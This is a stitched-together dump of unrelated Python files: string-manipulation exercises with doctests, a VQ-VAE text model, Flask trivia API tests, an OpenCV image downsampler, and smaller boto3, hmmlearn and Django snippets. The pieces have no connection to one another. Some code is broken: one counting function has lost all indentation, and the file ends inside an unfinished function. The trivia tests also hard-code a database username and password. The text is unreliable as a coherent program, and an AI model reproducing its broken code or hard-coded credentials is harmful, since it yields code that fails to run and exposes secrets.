# The first line contains the integer N, the number of people.
# N lines follow each containing the space separated values of the first name, last name, age and sex, respectively.
#
# Constraints
# 1 <= N <= 10
#
# Output Format
# Output N names on separate lines in the format described above in ascending order of age.
#
# Sample Input
# 3
# Mike Thomson 20 M
# Robert Bustle 32 M
# Andria Bustle 30 F
#
# Sample Output
# Mr. Mike Thomson
# Ms. Andria Bustle
# Mr. Robert Bustle
#
# Concept
# For sorting a nested list based on some parameter, you can use the itemgetter library.
# You can read more about it here.
# (http://stackoverflow.com/questions/409370/sorting-and-grouping-nested-lists-in-python?answertab=votes)
#
#######################################################################################################################
|
# coding: utf-8
import boto3
# Use the named AWS CLI profile for credentials.
session = boto3.Session(profile_name='Ian-pfb')
as_client = session.client('autoscaling')
# Manually trigger the 'Scale Up' policy on the example Auto Scaling group.
as_client.execute_policy(
    AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
|
from hmmlearn.hmm import MultinomialHMM
def fit(seqs, n_components=1):
    """Fit a multinomial HMM to *seqs* and return the trained model.

    Fix: the original built the model, never called ``fit``, ignored *seqs*
    entirely, and implicitly returned None.

    seqs: observation array in the shape hmmlearn's ``MultinomialHMM.fit``
        expects (n_samples, n_features) — TODO confirm the caller's data
        layout (a ``lengths`` argument may be needed for multiple sequences).
    n_components: number of hidden states.
    """
    model = MultinomialHMM(
        n_components=n_components,
        startprob_prior=1.0,
        transmat_prior=1.0,
        algorithm='viterbi',
        random_state=1,          # fixed seed for reproducible EM initialization
        n_iter=100,
        tol=0.01,
        verbose=True,
        params='ste',            # update start, transition and emission probs
        init_params='ste'
    )
    model.fit(seqs)
    return model
|
# COLLE Maxime
# DOUCHET Benjamin
# TP5
#ex1
# ex1: a single print of an empty string plus four newline arguments.
print('','\n','\n','\n','\n')
#ex2
def imprimer_vertical(s) :
    """Print each character of *s* on its own line (vertical layout).

    s: (str)
    C.U: none
    >>> imprimer_vertical ('Test')
    T
    e
    s
    t
    """
    for character in s:
        print(character)
#ex3
def my_len(a) :
    """Return the length of *a*, counted by hand (len() reimplementation exercise).

    a: (str)
    C.U: none
    >>> my_len('test')
    4
    >>> my_len('123456789')
    9
    """
    count = 0
    for _ in a:
        count += 1
    return count
#ex4
#Q1
def tirets(a) :
    """Return *a* with a dash appended after every character.

    a: (str)
    C.U: none
    >>> tirets('hello there')
    'h-e-l-l-o- -t-h-e-r-e-'
    >>> tirets('bonjour')
    'b-o-n-j-o-u-r-'
    """
    return ''.join(c + '-' for c in a)
#Q2
def tirets_v2(a) :
    """Like tirets() but spaces are copied as-is, with no trailing dash.

    a: (str)
    C.U: none
    >>> tirets_v2('hello there')
    'h-e-l-l-o- t-h-e-r-e-'
    """
    return ''.join(c if c == ' ' else c + '-' for c in a)
#Ex 5
def miroir(a):
    """Return *a* reversed.

    a: (str) word to reverse
    C.U: none
    >>> miroir('colle')
    'elloc'
    >>> miroir('kayak')
    'kayak'
    """
    return ''.join(reversed(a))
#Ex 6
#Q1
def est_palindromique(a) :
    """Predicate: True iff *a* reads the same forwards and backwards.

    a: (str)
    C.U: none
    >>> est_palindromique('kayak')
    True
    >>> est_palindromique('kaya')
    False
    """
    return a == ''.join(reversed(a))
#Q2
def est_palindromique_v2(a):
    """Predicate: True iff *a* is palindromic, delegating the reversal to miroir().

    a: (str)
    C.U: none
    >>> est_palindromique('kayak')
    True
    >>> est_palindromique('kaya')
    False
    """
    return a == miroir(a)
#Ex 7
#Q1
def supprimerOccCarac(a , b):
    """Return *a* with every occurrence of character *b* removed.

    a: (str) string to filter
    b: (str) single character to drop
    C.U: none
    >>> supprimerOccCarac('timoleon' , 'o')
    'timlen'
    """
    return ''.join(c for c in a if c != b)
#Q2
# NOTE(review): the boolean result is computed and discarded — it was
# probably meant to be printed or asserted.
est_palindromique_v2(supprimerOccCarac('esope reste ici et se repose' , ' '))
#Ex8
def mettreEnMajuscule(a) :
    """Upper-case the ASCII letters 'a'-'z' of *a*; accented letters are untouched.

    a: (str) string to upper-case
    C.U: none
    >>> mettreEnMajuscule('polom étro')
    'POLOM éTRO'
    """
    shift = ord('a') - ord('A')
    result = ''
    for c in a:
        if 'a' <= c <= 'z':
            c = chr(ord(c) - shift)
        result += c
    return result
#ex 9
def mettreEnMinuscule(a) :
    """Lower-case the ASCII letters 'A'-'Z' of *a*; accented letters are untouched.

    a: (str) string to lower-case
    C.U: none
    >>> mettreEnMinuscule('POLOM éTRO')
    'polom étro'
    >>> mettreEnMinuscule('aBC\u00c9,3 @!-XYz')
    'abcÉ,3 @!-xyz'
    """
    shift = ord('a') - ord('A')
    result = ''
    for c in a:
        if 'A' <= c <= 'Z':
            c = chr(ord(c) + shift)
        result += c
    return result
#ex 10
def transformerMinMaj(a) :
    """Swap the case of ASCII letters only; accented letters are left unchanged.

    a: (str) string to transform
    C.U: none
    >>> transformerMinMaj('Pollo MéTRo')
    'pOLLO métrO'
    >>> transformerMinMaj('aBC\u00c9,3 @!-XYz')
    'AbcÉ,3 @!-xyZ'
    """
    shift = ord('a') - ord('A')
    result = ''
    for c in a:
        if 'A' <= c <= 'Z':
            result += chr(ord(c) + shift)
        elif 'a' <= c <= 'z':
            result += chr(ord(c) - shift)
        else:
            result += c
    return result
#ex 11
def comparerChaines( a , b ) :
    """Three-way lexicographic comparison: 0 if a == b, 1 if a > b, 2 if a < b.

    a: (str) first string
    b: (str) second string
    >>> comparerChaines('texte' , 'texte')
    0
    >>> comparerChaines('texto' , 'texte')
    1
    >>> comparerChaines('texte' , 'texto')
    2
    >>> comparerChaines('teeeeeeexte' , 'texto')
    2
    """
    if a == b:
        return 0
    return 1 if a > b else 2
#ex12
#Q1
def rechercherCaractereG(a,b):
    """Index of the first occurrence of character *b* in *a* (left scan), or -1.

    a: (str) string to scan
    b: (str) character to look for
    >>> rechercherCaractereG('voici une chaîne', 'i')
    2
    >>> rechercherCaractereG('voici une chaîne', 'x')
    -1
    """
    for index, c in enumerate(a):
        if c == b:
            return index
    return -1
#Q2
def rechercherCaractereD(a,b):
    """Index of the first occurrence of *b* scanning *a* from the right, or -1.

    a: (str) string to scan
    b: (str) character to look for
    >>> rechercherCaractereD('voici une chaîne', 'i')
    4
    >>> rechercherCaractereD('voici une chaîne', 'x')
    -1
    """
    for index in range(len(a) - 1, -1, -1):
        if a[index] == b:
            return index
    return -1
#Q3
def rechercherCaractereG_V2(a,b):
    """Index of the first (leftmost) occurrence of *b* in *a*, or -1.

    Implemented by mirroring *a* and searching from the right, then mapping
    the mirrored index back to the original string.

    Fixes over the original: the search result was discarded (the function
    returned None), the mirrored index was never converted back, and the
    doctests exercised the wrong function.

    a: (str) string to scan
    b: (str) character to look for
    >>> rechercherCaractereG_V2('voici une chaîne', 'i')
    2
    >>> rechercherCaractereG_V2('voici une chaîne', 'x')
    -1
    """
    pos = rechercherCaractereD(miroir(a), b)
    if pos == -1:
        return -1
    # Index i in the mirrored string corresponds to len(a)-1-i in the original.
    return len(a) - 1 - pos
#ex13
def nbreOccurences(a,b):
"""
compte le nombre d'occurence dans a de b
a ( str ) chaine de caractere à analyser
b ( str ) le caractère à rechercher
"""
temp = 0
for c in a :
if c == b :
temp = temp+1
return temp
# ex14
#Q1
def plusFrequent(a):
    """Most frequent lowercase ASCII letter in *a*, or '' if none occurs.

    Ties are broken in favour of the alphabetically first letter.

    a: (str) lowercase text
    C.U: none
    >>> plusFrequent('esope reste ici et se repose')
    'e'
    >>> plusFrequent("Il y a autant de 'e' que de 'a' dans cette phrase, pas plus")
    'a'
    >>> plusFrequent('')
    ''
    """
    best, best_count = "", 0
    for letter in "abcdefghijklmnopqrstuvwxyz":
        count = sum(1 for c in a if c == letter)
        if count > best_count:
            best, best_count = letter, count
    return best
#Q2
def plusFrequent_V2(a):
    """Same contract as plusFrequent(), but counting via nbreOccurences().

    a: (str) lowercase text
    C.U: none
    >>> plusFrequent_V2('esope reste ici et se repose')
    'e'
    >>> plusFrequent_V2("Il y a autant de 'e' que de 'a' dans cette phrase, pas plus")
    'a'
    >>> plusFrequent_V2('')
    ''
    """
    best, best_count = "", 0
    for letter in "abcdefghijklmnopqrstuvwxyz":
        count = nbreOccurences(a, letter)
        if count > best_count:
            best, best_count = letter, count
    return best
#Ex15
#Q1
def supprimerCarac(s,b):
    """Return *s* without the character at index *b* (0-based, non-negative).

    Negative or out-of-range indices leave *s* unchanged.

    s: (str) string to edit
    b: (int) index of the character to remove
    C.U: none
    >>> supprimerCarac('Timoleon', 3)
    'Timleon'
    >>> supprimerCarac('Timoleon', -2)
    'Timoleon'
    >>> supprimerCarac('Timoleon', 10)
    'Timoleon'
    """
    if 0 <= b < len(s):
        return s[:b] + s[b + 1:]
    return s
#Q2
def supprimerCarac_v2(s,b):
    """Like supprimerCarac() but also accepts negative (from-the-end) indices.

    Out-of-range indices (either direction) leave *s* unchanged.

    s: (str) string to edit
    b: (int) index of the character to remove
    C.U: none
    >>> supprimerCarac_v2('Timoleon', 3)
    'Timleon'
    >>> supprimerCarac_v2('Timoleon', -1)
    'Timoleo'
    >>> supprimerCarac_v2('Timoleon', 10)
    'Timoleon'
    >>> supprimerCarac_v2('Timoleon', -8)
    'imoleon'
    """
    index = b if b >= 0 else len(s) + b
    if 0 <= index < len(s):
        return s[:index] + s[index + 1:]
    return s
#Ex 16
def insererCaractere ( a , b , c ):
    """Insert string *c* before index *b* of *a*; out-of-range *b* is a no-op.

    Note: insertion at index len(a) (i.e. appending) is intentionally NOT
    supported, matching the original loop-based implementation.

    a: (str) string to edit
    b: (int) insertion index
    c: (str) string to insert
    C.U: b non-negative integer
    >>> insererCaractere('Timleon', 3, 'o')
    'Timoleon'
    >>> insererCaractere('Aucune modification', 20, '!')
    'Aucune modification'
    """
    if 0 <= b < len(a):
        return a[:b] + c + a[b:]
    return a
#ex 17
#Q1
def remplacerCaractere ( a , b , c ):
    """Replace the character at index *b* of *a* with string *c* (no-op out of range).

    a: (str) string to edit
    b: (int) non-negative index of the character to replace
    c: (str) replacement string
    >>> remplacerCaractere('Tim-leon', 3, 'o')
    'Timoleon'
    >>> remplacerCaractere('Ti-on', 2, 'mole')
    'Timoleon'
    >>> remplacerCaractere('Aucune modification', 20, ' réalisée')
    'Aucune modification'
    """
    if 0 <= b < len(a):
        return a[:b] + c + a[b + 1:]
    return a
#Q2
def remplacerOccurrences(a ,b ,c ):
    """Replace every character of *a* that equals *b* with the string *c*.

    a: (str) string to edit
    b: (str) single character to replace
    c: (str) replacement string
    >>> remplacerOccurrences('@ 3 est le neveu de @ 1er.','@','Napoléon')
    'Napoléon 3 est le neveu de Napoléon 1er.'
    """
    return ''.join(c if ch == b else ch for ch in a)
if __name__ == '__main__':
    # Run every doctest in this module, printing each trial (verbose mode).
    import doctest
    doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS, verbose = True)
# Beginner demo of basic types and operators.
number1 = 3 # integer literal assigned to a variable
number2 = 4 # Integer
float_ = 2.35 # Float: has a decimal part
boolean = True # bool: one of two outcomes - True or False
character = "%"
string = "qwer" # a string is any text within the quotation marks
sudetis = number1 + number2
rounded1float = round(float_, 1) # round() trims a float to the given number of decimals
print(2**3) # Raise 2 to the power of 3
dalyba_su_liekana = 1654813 % 15427 # Remainder of the division (modulo operator)
print(dalyba_su_liekana)
print(len(string)) # Prints the number of symbols in the string
|
import torch
import math
import numpy as np
from torch import nn
from torch.nn import functional as F
from typing import Union
from vq_vae_text.modules import Quantize, GeometricCategoricalDropout, CategoricalNoise, SlicedQuantize, ChannelWiseLayerNorm, wn_conv_transpose1d, wn_conv1d, wn_linear, Attention
from vq_vae_text.models.transformer import PositionalEncoding
class ResBlock(nn.Module):
    """1-D residual block: ELU -> dilated conv -> ELU -> conv, plus a skip connection."""
    def __init__(self, in_channel, channel, kernel_size=3, padding=1, dilation=1):
        # NOTE(review): the `dilation` parameter is accepted but never used —
        # the first conv hard-codes dilation=3 (padding+2 keeps the sequence
        # length unchanged for kernel_size=3).  Honouring the parameter would
        # change the behaviour of existing/trained models, so confirm intent
        # before fixing.
        super().__init__()
        self.conv = nn.Sequential(
            nn.ELU(),
            nn.Conv1d(in_channel, channel, kernel_size=kernel_size, padding=padding + 2, dilation=3),
            nn.ELU(),
            nn.Conv1d(channel, in_channel, kernel_size=kernel_size, padding=padding),
        )
    def forward(self, input):
        # Residual connection: add the block output to its input.
        return self.conv(input) + input
class Encoder(nn.Module):
    """Downsampling encoder: strided conv (halves length), residual blocks, self-attention."""

    def __init__(self, in_channel, channel, res_channel, n_res_blocks=2):
        super().__init__()
        # Kernel 4 / stride 2 / padding 1 halves the sequence length.
        self.first = nn.Conv1d(in_channel, channel, kernel_size=4, stride=2, padding=1)
        self.blocks = nn.Sequential(
            *[ResBlock(channel, res_channel) for _ in range(n_res_blocks)])
        self.attention = Attention(channel, channel // 4, channel, n_heads=1)

    def forward(self, input):
        # Fix: the original also bound the conv output to an unused `keys`
        # alias (`out = keys = self.first(input)`); the dead name is removed.
        out = self.first(input)
        out = self.blocks(out)
        # Residual self-attention over the conv features.
        out = out + self.attention(out, out)
        return out
class Decoder(nn.Module):
    """Upsampling decoder: residual blocks, self-attention, transposed conv (doubles length)."""

    def __init__(self, channel, out_channel, res_channel, n_res_blocks=2):
        super().__init__()
        # Fix: the original assigned self.blocks = nn.Sequential(*blocks)
        # twice (before and after self.final) with the same ResBlock
        # instances; a single assignment is sufficient and preserves the
        # module/parameter registration order (blocks, attention, final).
        self.blocks = nn.Sequential(
            *[ResBlock(channel, res_channel) for _ in range(n_res_blocks)])
        self.attention = Attention(channel, channel // 4, channel, n_heads=1)
        # Kernel 4 / stride 2 / padding 1 doubles the sequence length.
        self.final = nn.ConvTranspose1d(channel, out_channel, kernel_size=4, stride=2, padding=1)

    def forward(self, input):
        out = self.blocks(input)
        out = out + self.attention(out, out)
        return self.final(out)
class TextCNNV2(nn.Module):
    """Convolutional VQ-VAE over token sequences.

    Pipeline: embedding -> stack of strided-conv Encoders -> vector
    quantization -> stack of transposed-conv Decoders -> per-position
    log-probabilities over the vocabulary.

    Fix over the original: ``nn.NLLLoss`` requires an int ``ignore_index``,
    so a ``pad_idx`` of None (which the signature allows) no longer crashes
    construction — PyTorch's default sentinel -100 is used instead.
    """
    def __init__(self,
                 vocab_size: int,
                 channel: int,
                 res_channel: int,
                 n_res_blocks: int,
                 n_encoders: int,
                 tau: float,
                 pad_idx: Union[None, int],
                 input_noise=0.0,
                 embed_dropout=0.0,
                 num_vq_embeds: int = 512,
                 vq_embeds_dim: int = None,
                 vq_loss_alpha=0.25,
                 vq_decay=0.99,
                 ignore_quant=False):
        super().__init__()
        self.vocab_size = vocab_size
        self.pad_idx = pad_idx
        self.tau = tau  # softmax temperature applied to the decoder logits
        self.vq_loss_alpha = vq_loss_alpha
        self.ignore_quant = ignore_quant
        # Rolling diagnostics, refreshed by loss_function().
        self.vq_loss = 0
        self.nll_loss = 0
        self.acc = 0
        # Blend bookkeeping (blend_step is advanced in forward()).
        self.vq_blend = 0.0
        self.blend_steps = 5000
        self.blend_step = 0
        self.vq_embeds_dim = vq_embeds_dim
        self.input_noise = CategoricalNoise(vocab_size, input_noise)
        self.embed_dropout = nn.Dropout(embed_dropout)
        self.embed = nn.Embedding(vocab_size, channel, padding_idx=pad_idx, max_norm=1.0)
        # n_encoders stacked halvings / doublings of the sequence length.
        self.encoder = nn.Sequential(*[Encoder(channel, channel, res_channel, n_res_blocks)
                                       for _ in range(n_encoders)])
        self.decoder = nn.Sequential(*[Decoder(channel, channel, res_channel, n_res_blocks)
                                       for _ in range(n_encoders)])
        # 1x1 convs project between the conv width and the VQ embedding dim.
        self.conv_to_quant = nn.Conv1d(channel, vq_embeds_dim, kernel_size=1)
        self.quant_to_conv = nn.Conv1d(vq_embeds_dim, channel, kernel_size=1)
        self.quantize = Quantize(dim=vq_embeds_dim, n_embed=num_vq_embeds, decay=vq_decay)
        self.conv_to_logits = nn.Conv1d(channel, vocab_size, kernel_size=1)
        # Fix: nn.NLLLoss needs an int ignore_index; fall back to the torch
        # default sentinel (-100) when there is no padding token.
        self.nll = nn.NLLLoss(reduction='none',
                              ignore_index=self.pad_idx if self.pad_idx is not None else -100)

    def get_quantization_layers(self):
        """Return the quantization modules (used by training utilities)."""
        return [self.quantize]

    def encode(self, input):
        """Embed, encode and quantize *input* -> ([quant], commitment diff, [codes])."""
        out = self.embed(input)
        out = out.permute(0, 2, 1)  # (B, T, C) -> (B, C, T) for Conv1d
        out = self.encoder(out)
        out = self.conv_to_quant(out).permute(0, 2, 1)
        quant, diff, code = self.quantize(out)
        quant = quant.permute(0, 2, 1)
        return [quant], diff, [code]

    def decode(self, quants):
        """Decode quantized features into per-position log-probabilities."""
        quant = quants[0]
        quant = self.quant_to_conv(quant)
        out = self.decoder(quant)
        logits = self.conv_to_logits(out)
        logits = logits.permute(0, 2, 1)  # back to (B, T, vocab)
        logits = logits / self.tau        # temperature scaling
        logp_probs = F.log_softmax(logits, dim=-1)
        return logp_probs

    def decode_code(self, codes):
        """Decode directly from discrete code indices (e.g. for sampling)."""
        code = codes[0]
        quant = self.quantize.embed_code(code)
        quant = quant.permute(0, 2, 1)
        return self.decode([quant])

    def forward(self, x):
        z, diff, ids = self.encode(x)
        logp = self.decode(z)
        self.blend_step += 1
        return logp, z, diff, ids

    def compute_accuracy(self, recon_probs, target, mask=None):
        """Mean per-sequence token accuracy, ignoring masked (padding) positions."""
        if mask is None:
            mask = torch.ones_like(target)
        lens = mask.sum(-1).float()
        corr = ((recon_probs.argmax(-1) == target) * mask).sum(-1) / lens
        return corr.double().mean().item()

    def loss_function(self, inputs, target):
        """NLL reconstruction loss + weighted VQ commitment loss; updates diagnostics."""
        logp, z, diff, ids = inputs
        if self.pad_idx is not None:
            mask = target != self.pad_idx
        else:
            mask = torch.ones_like(target)
        lens = mask.sum(-1).float()
        acc = self.compute_accuracy(logp, target, mask=mask)
        bs = logp.size(0)
        logp = logp.view(-1, logp.size(-1))
        target = target.reshape(-1)
        # Per-token NLL, masked and length-normalized per sequence.
        nll_loss = self.nll(logp, target).view(bs, -1) * mask
        nll_loss = (nll_loss.sum(-1) / lens).mean()
        self.vq_loss = diff
        self.nll_loss = nll_loss
        self.acc = acc
        return self.nll_loss + self.vq_loss_alpha * self.vq_loss

    def latest_losses(self):
        """Return the most recent loss components for logging."""
        return {
            'nll': self.nll_loss,
            'ppl': math.exp(self.nll_loss),
            'bpc': self.nll_loss / math.log(2),
            'vq': self.vq_loss,
            'acc': self.acc,
        }
|
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from models import setup_db, Question, Category
from flaskr import create_app
class TriviaTestCase(unittest.TestCase):
    """Integration tests for the trivia API (requires a local trivia_test Postgres DB)."""
    def setUp(self):
        """Define test variables and initialize app."""
        self.app = create_app()
        self.client = self.app.test_client
        # db_config = self.app.config["DATABASE_SETUP"]
        # NOTE(review): credentials are hard-coded; prefer environment
        # variables.  Also, SQLAlchemy >= 1.4 rejects the "postgres://"
        # scheme in favour of "postgresql://" — confirm the pinned version.
        self.app.config["SQLALCHEMY_DATABASE_URI"] = "postgres://{}:{}@{}/{}"\
            .format("AshNelson",
                    "ologinahtti1",
                    "localhost:5432",
                    "trivia_test")
        setup_db(self.app)
        # Fixture payload reused by the creation tests.
        self.new_question = {
            "category" : 6,
            "question" : "Who is the greatest developer? Hint: the author "
                         "of this question",
            "answer" : "Joao Albuquerque",
            "difficulty": 1
        }
        # binds the app to the current context
        with self.app.app_context():
            self.db = SQLAlchemy()
            self.db.init_app(self.app)
            # create all tables
            self.db.create_all()
    def tearDown(self):
        """Executed after reach test"""
        pass
    # Done: Write at least one test for each test for successful operation
    # and for expected errors. GET Categories
    def test_retrieve_categories(self):
        res = self.client().get('/api/categories')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        # NOTE(review): assertTrue's second argument is the failure message,
        # not an expected value.
        self.assertTrue(data['categories'], True)
    # GET Questions - Paginated
    def test_retrieve_questions_paginated(self):
        res = self.client().get('/api/questions')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
    # GET Questions - Paginated - Out of bounds
    def test_retrieve_questions_out_of_pagination(self):
        res = self.client().get('/api/questions?page=1000')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 404)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # GET Questions by Category
    def test_retrieve_questions_by_category_paginated(self):
        res = self.client().get('/api/categories/6/questions')
        data = json.loads(res.data)
        total_questions = len(Question.query.filter(Question.category == 6)
                              .all())
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
        self.assertEqual(data['total_questions'], total_questions)
    # GET Questions by Category - out of bounds
    def test_retrieve_questions_by_category_out_of_pagination(self):
        res = self.client().get('/api/categories/6/questions?page=1000')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 404)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # POST Create a Questions
    def test_create_questions(self):
        res = self.client().post('/api/questions', json=self.new_question)
        data = json.loads(res.data)
        # The newest question has the highest id; compare against 'created'.
        question = Question.query.order_by(Question.id).all()
        total_questions = len(question)
        print("Total questions: ", total_questions)
        added_question = question[total_questions-1]
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertEqual(data['created'], added_question.id)
        self.assertEqual(data['message'], "Question created")
        # Clean up
        added_question.delete()
    # POST Failed to Create a Questions
    def test_create_questions_not_enough_information(self):
        res = self.client().post('/api/questions', json={})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 422)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # POST Failed to Create a Questions wrong Endpoint
    def test_create_questions_wrong_endpoint(self):
        res = self.client().post('/api/questions/12', json={})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 405)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # DELETE a Question - no id specified
    def test_delete_question_by_id_no_id_specified(self):
        res = self.client().delete('/api/questions/')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 404)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # DELETE a Question - invalid id specified
    def test_delete_question_by_id_no_question_found(self):
        res = self.client().delete('/api/questions/1')
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 422)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # DELETE a Question - successfully
    def test_delete_question_by_id(self):
        # add a question and use that id to delete
        added_question = Question(
            question="This is a question?",
            category=3,
            difficulty=3,
            answer="This is an answer"
        )
        added_question.insert()
        res = self.client().delete('/api/questions/{}'.
                                   format(added_question.id))
        data = json.loads(res.data)
        # NOTE(review): total_questions is computed but never asserted.
        total_questions = len(Question.query.all())
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertEqual(data['message'], "Deleted")
    # POST Search Questions - with results
    def test_search_questions_with_results(self):
        res = self.client().post('/api/questions/search',
                                 json={"search_term": "title"})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
        self.assertGreater(data['total_questions'], 0)
    # POST Search Questions - no results
    def test_search_questions_without_results(self):
        res = self.client().post('/api/questions/search',
                                 json={"search_term": "zebra"})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertFalse(data['questions'])
        self.assertEqual(data['total_questions'], 0)
    # POST Search Questions - blank searchTerm
    def test_search_questions_blank_search_term(self):
        res = self.client().post('/api/questions/search',
                                 json={"search_term": ""})
        data = json.loads(res.data)
        total_questions = len(Question.query.all())
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
        self.assertEqual(data['total_questions'], total_questions)
    # POST Search Questions - no searchTerm
    def test_search_questions_no_search_term(self):
        res = self.client().post('/api/questions/search', json={})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 500)
        self.assertEqual(data['success'], False)
    # POST Play Quiz - One category
    def test_play_quizz_one_category_empty_previous_questions(self):
        res = self.client().post('/api/quizzes',
                                 json={"quiz_category": {"id" : 6,
                                                         "type" : "Sports"},
                                       "previous_questions" : []})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
        self.assertTrue(data['question'])
        self.assertTrue(data['total_questions'])
    # POST Play Quiz - Category out of bounds
    def test_play_quizz_one_category_fake_category_id(self):
        res = self.client().post('/api/quizzes',
                                 json={"quiz_category": {"id": 99,
                                                         "type": "Fake"},
                                       "previous_questions" : []})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 404)
        self.assertEqual(data['success'], False)
        self.assertTrue(data['message'])
    # POST Play Quiz - with previous questions
    def test_play_quizz_one_category_with_previous_questions(self):
        # NOTE(review): question id 62 is assumed to exist in the seed data.
        res = self.client().post('/api/quizzes',
                                 json={"quiz_category": {"id": 6,
                                                         "type": "Sports"},
                                       "previous_questions": [62]})
        data = json.loads(res.data)
        self.assertEqual(res.status_code, 200)
        self.assertEqual(data['success'], True)
        self.assertTrue(data['questions'])
        self.assertTrue(data['question'])
        self.assertTrue(data['total_questions'])
        self.assertTrue(data['previousQuestions'])
# Make the tests conveniently executable
# Run the whole suite when executed directly.
if __name__ == "__main__":
    unittest.main()
from importlib import import_module
from django.apps import AppConfig as BaseAppConfig
class AppConfig(BaseAppConfig):
    """Django app config that wires up signal receivers at startup."""

    name = "birdproj"

    def ready(self):
        # Importing each module registers its signal receivers as a side effect.
        # @@@ upgrade pinax-wiki to load in its own apps.py
        for dotted_path in (
            "birdproj.receivers",
            "birdproj.profiles.receivers",
            "wiki.receivers",
        ):
            import_module(dotted_path)
|
import argparse
import cv2
class DSample:
    """Downsample an image with bicubic interpolation, optionally Gaussian-blurred first.

    NOTE(review): each helper method below rebinds its own name on the
    instance with its computed value (e.g. ``self.image`` the method becomes
    ``self.image`` the ndarray), so every helper is callable exactly once.
    It works because __init__ calls them in a fixed order, but it is fragile —
    consider distinct attribute/method names.
    """
    # File extensions OpenCV's imread can handle.
    SUPPORTED_FORMATS = (
        ".bmp",
        ".dib",
        ".jpeg",
        ".jpg",
        ".jpe",
        ".jp2",
        ".png",
        ".pbm",
        ".pgm",
        ".ppm",
        ".sr",
        ".ras",
        ".tif",
        ".tiff",
    )
    def __init__(self, *args_dict, **kwargs):
        # Accept attribute values from positional dicts and/or keyword args
        # (the CLI passes **vars(args)).
        for dictionary in args_dict:
            for key in dictionary:
                setattr(self, key, dictionary[key])
        for key in kwargs:
            setattr(self, key, kwargs[key])
        # Pipeline: load -> (optional blur) -> record dims -> pick factor -> resize.
        self.image()
        if self.gaussian_kernel:
            self.blur()
        self.dimensions()
        self.scale_factor()
        self.sample()
    # DSample.image
    def image(self):
        """Read image data"""
        self.image = cv2.imread(self.filename)
    # DSample.blur
    def blur(self):
        """Apply Gaussian Blur"""
        # ksize=(0, 0) lets OpenCV derive the kernel size from sigma.
        self.image = cv2.GaussianBlur(
            self.image,
            ksize=(0, 0),
            sigmaX=1,
            sigmaY=1
        )
    # DSample.dimensions
    def dimensions(self):
        """Set image dimensions"""
        # OpenCV shape is (rows, cols); store as (width, height).
        self.dimensions = (self.image.shape[1], self.image.shape[0])
    # DSample.scale_factor
    def scale_factor(self):
        """Factor for downsample, 2x, 3x, 4x"""
        # NOTE(review): 1/6 is ~0.167, so '6': 0.12 looks like a typo — confirm.
        scale = {
            '2': (0.5, 0.5),
            '3': (0.33, 0.33),
            '4': (0.25, 0.25),
            '5': (0.2, 0.2),
            '6': (0.12, 0.12),
        }
        # None (unknown factor) makes sample() fall back to (1, 1), i.e. no-op.
        self.scale_factor = scale.get(self.downsample, None)
    # DSample.sample
    def sample(self):
        """Downsample the image."""
        fx, fy = self.scale_factor or (1, 1)
        # d_sample: actually downsampled image.
        self.d_sample = cv2.resize(
            self.image,
            (0, 0),
            fx=fx,
            fy=fy,
            interpolation=cv2.INTER_CUBIC
        )
        # p_sample: downsampled image upscaled back to the original dimensions.
        self.p_sample = cv2.resize(
            self.d_sample,
            self.dimensions,
            interpolation=cv2.INTER_CUBIC
        )
if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='downsample image using bicubic interpolation',
    )
    parser.add_argument(
        "filename",
        help="input filename to downsample"
    )
    parser.add_argument(
        "-o",
        "--output",
        help="output filename for downsampled image"
    )
    parser.add_argument(
        "-d",
        "--downsample",
        metavar='n',
        help="downsample by a factor of 2, 3, 4, 5, 6"
    )
    parser.add_argument(
        "-g",
        "--gaussian-kernel",
        help="apply a gaussian kernel, effective in reducing gaussian noise",
        action="store_true"
    )
    parser.add_argument(
        "-s",
        "--save-dimensions",
        help="downsampled image dimensions are the same as input dimensions",
        action="store_true"
    )
    args = parser.parse_args()
    # All CLI options become DSample attributes via **kwargs.
    dsample = DSample(**vars(args))
    # -s writes the re-upscaled image (original size); otherwise the small one.
    # NOTE(review): -o is optional but cv2.imwrite(None, ...) will fail —
    # consider making --output required or defaulting it.
    if dsample.save_dimensions:
        cv2.imwrite(dsample.output, dsample.p_sample)
    else:
        cv2.imwrite(dsample.output, dsample.d_sample)
|
from TexTor import get_nlp
from TexTor.understand.coreference import replace_coreferences
from TexTor.understand.inflect import singularize as make_singular
from spacy.parts_of_speech import NOUN
def singularize(text, nlp=None):
    """Return *text* with its nouns singularized and "are" mapped to "is".

    Tokens listed in *ignores* are never singularized even when tagged as
    nouns.  A spaCy pipeline may be supplied via *nlp*; otherwise the
    module default from get_nlp() is used.
    """
    nlp = nlp or get_nlp()
